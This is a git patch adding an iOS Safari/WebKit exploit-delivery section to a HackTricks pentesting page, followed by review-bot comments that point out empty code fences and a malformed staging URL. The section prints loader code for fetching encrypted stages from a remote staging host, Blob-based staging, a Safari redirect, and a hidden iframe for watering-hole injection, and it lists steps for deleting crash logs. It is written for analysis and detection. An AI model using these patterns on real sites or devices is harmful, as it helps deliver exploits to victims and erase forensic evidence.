From 272d2a0b0fc6dc5380fef01d48fa7932338a1e2f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 19 Mar 2026 13:14:26 +0000 Subject: [PATCH] Add content from: The Proliferation of DarkSword: iOS Exploit Chain Adopted by... --- .../ios-pentesting/ios-webviews.md | 107 +++++++++++++++++- 1 file changed, 106 insertions(+), 1 deletion(-) diff --git a/src/mobile-pentesting/ios-pentesting/ios-webviews.md b/src/mobile-pentesting/ios-pentesting/ios-webviews.md index 76bc1042036..763572ae5dd 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-webviews.md +++ b/src/mobile-pentesting/ios-pentesting/ios-webviews.md 
@@ -284,6 +284,110 @@ class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler { } ``` + +## iOS Web Exploit Delivery & Staging Tradecraft + +The following patterns have been observed in real-world iOS Safari/WebKit exploit delivery chains and are useful for analysis, detection, and controlled emulation. + +### Multi-stage loader via hidden iframes + +A common staging pattern is to gate execution to avoid reinfection or analysis and then inject a hidden/off-screen `iframe` for the next stage: + +```html + +``` + +A minimal staging page can inject the main loader via `document.write()`: + +```html + +``` + +Loader stages frequently pull subsequent JavaScript synchronously: + +```javascript +function getJS(fname) { + const xhr = new XMLHttpRequest(); + xhr.open('GET', fname, false); + xhr.send(null); + return xhr.responseText; +} +``` + +Later stages can be executed in a worker-like context by building a Blob URL: + +```javascript +const workerCode = getJS('rce_worker_18.4.js'); +const workerBlob = new Blob([workerCode], { type: 'text/javascript' }); +const workerBlobUrl = URL.createObjectURL(workerBlob); +``` + +### Forcing Safari to hit the WebKit/JSC surface + +If a victim opens a lure in another browser, a protocol handler can force Safari: + +```javascript +if (typeof browser === 'undefined' && isIphone()) { + location.href = 'x-safari-https://example.com/'; +} +``` + +### Encrypted stage fetch (ECDH + AES) + +Some loaders encrypt exploit stages in transit. 
A minimal client flow is: generate an ephemeral ECDH keypair, POST the base64 public key, receive encrypted blobs, derive an AES key, decrypt, then decode to JavaScript: + +```javascript +const kp = generateKeyPair(); +const pubPem = exportPublicKeyAsPem(kp.publicKey); +const xhr = new XMLHttpRequest(); +xhr.open('POST', 'https:///stage?'+Date.now(), false); +xhr.setRequestHeader('Content-Type', 'application/json'); +xhr.send(JSON.stringify({ a: btoa(pubPem) })); +const { a, b } = JSON.parse(xhr.responseText); +const aesKey = deriveAesKey(kp.privateKey, b64toUint8Array(b)); +const js = new TextDecoder().decode(decryptData(b64toUint8Array(a), aesKey)); +``` + +### Watering-hole injection pattern + +Compromised sites can load a remote script that builds an off-screen `iframe` and constrains it with a sandbox while still allowing script execution: + +```html + +``` + +```javascript +const iframe = document.createElement('iframe'); +iframe.src = 'https://static.example.net/assets/index.html'; +iframe.style.width = '1px'; +iframe.style.height = '1px'; +iframe.style.position = 'absolute'; +iframe.style.left = '-9999px'; +iframe.style.opacity = '0.01'; +iframe.setAttribute('sandbox', 'allow-scripts allow-same-origin'); +document.body.appendChild(iframe); +``` + +### Post-exploitation anti-forensics indicators (JS implants) + +- Temporary staging under `/tmp/./` with subfolders like `STORAGE`, `DATA`, and `TMP`. +- Deletion of crash logs in `/var/mobile/Library/Logs/CrashReporter/` (often filtered by WebKit/SpringBoard substrings). +- Recursive deletion of `/private/var/containers/Shared/SystemGroup/systemgroup.com.apple.osanalytics/DiagnosticReports/`. + ## Debugging iOS WebViews (Tutorial based on the one from [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews)) 
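Review bot: the three ```html fences in this hunk are empty (the one after "inject a hidden/off-screen `iframe`", the one after "inject the main loader via `document.write()`", and the first block under "Watering-hole injection pattern"), so each of those claims ships without the snippet that is supposed to show it; either restore the markup or drop the empty fences and fold the description into the prose. Related to that, the watering-hole sentence "constrains it with a sandbox while still allowing script execution" overstates what `iframe.setAttribute('sandbox', 'allow-scripts allow-same-origin')` does: with both flags set the framed page keeps its origin and runs script, so the attribute does not hinder the exploit stage at all and the text should say the sandbox is set but effectively non-restrictive. Three smaller points in the same hunk: `xhr.open('POST', 'https:///stage?'+Date.now(), false)` has no host, so use a placeholder such as `https://<staging-host>/stage` rather than a malformed URL; the Blob snippet stops at `URL.createObjectURL(workerBlob)` and never constructs the Worker, so "executed in a worker-like context" is not shown, and a closing `new Worker(workerBlobUrl)` (or a note that it is omitted) is needed; and `generateKeyPair()`, `exportPublicKeyAsPem()`, `deriveAesKey()`, `decryptData()`, `b64toUint8Array()`, `isIphone()` and the `browser` global are never defined, so say they are the loader's own helpers and spell out that in the response `a` is the ciphertext and `b` is the server's public key (as the calls `deriveAesKey(kp.privateKey, b64toUint8Array(b))` and `decryptData(b64toUint8Array(a), aesKey)` imply), since the prose only says "receive encrypted blobs". Finally, this section describes Safari/WebKit exploit delivery rather than in-app WKWebView behaviour, so a one-line pointer at the top explaining why it sits in ios-webviews.md would help readers of this page.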
@@ -303,6 +407,8 @@ However, be mindful of the limitations: ## References +- [https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/](https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/) + - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6) - [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS) - [https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md) @@ -310,4 +416,3 @@ However, be mindful of the limitations: {{#include ../../banners/hacktricks-training.md}} -
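Review bot: the new reference line is followed by an added blank line before the unchanged `- [https://mobile-security.gitbook.io/...]` entry, which splits the References bullets into two separate lists when the markdown renders; drop the blank line so the cloud.google.com entry joins the existing list like the other items.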